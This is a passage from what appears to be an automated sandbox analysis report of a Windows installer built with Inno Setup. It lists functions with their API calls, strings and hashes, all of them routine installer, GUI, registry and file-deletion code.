                                                                                                                                                                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                                                                                                                  • String ID: %H
                                                                                                                                                                                                                                  • API String ID: 3275473261-1959103961
                                                                                                                                                                                                                                  • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                                                                                                                  • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004964F4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                                                                                                                    • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                                                                                                                  • String ID: Deleting Uninstall data files.
                                                                                                                                                                                                                                  • API String ID: 1570157960-2568741658
                                                                                                                                                                                                                                  • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                                                                                                                  • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004701FC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                                                                                                                                                  • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                                                                                                                                                  • AddFontResource, xrefs: 004702B5
                                                                                                                                                                                                                                  • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                                                                                                                  • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                                                                                                                  • API String ID: 955540645-649663873
                                                                                                                                                                                                                                  • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                                                                                                                  • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00462E30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                                                                                                                                    • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                                                                                                                                    • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 00462E60
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                                                                                                                                                  • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                                                                                                                  • String ID: Explorer
                                                                                                                                                                                                                                  • API String ID: 2594429197-512347832
                                                                                                                                                                                                                                  • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                                                                                                                  • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478370 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,020A2BF4,?,?,?,020A2BF4), ref: 004783CC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,020A2BF4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                                                                                                                                  • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 2704155762-2318956294
                                                                                                                                                                                                                                  • Opcode ID: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                                                                                                                                  • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00459E0C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                                                                                                                                                    • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                                                                                                                                                  • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                                                                                                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                                                                                                                                                  • Deleting directory: %s, xrefs: 00459E5B
                                                                                                                                                                                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                                                                                                                                                  • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                                                                                                                                                  • Stripped read-only attribute., xrefs: 00459E94
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorFindLast
                                                                                                                                                                                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                                                                                                                  • API String ID: 754982922-1448842058
                                                                                                                                                                                                                                  • Opcode ID: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                                                                                                                                  • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00422E50 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EA4
                                                                                                                                                                                                                                  • GetCapture.USER32 ref: 00422EB3
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 862346643-0
                                                                                                                                                                                                                                  • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                                                                                                                  • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042F290 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveLong$Message
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2785966331-0
                                                                                                                                                                                                                                  • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                                                                                                                  • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00429480 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0042948A
                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                                                                                                                                                    • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1583807278-0
                                                                                                                                                                                                                                  • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                                                                                                                  • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041DE24 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                                                                                                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 225703358-0
                                                                                                                                                                                                                                  • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                                                                                                                                                                  • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
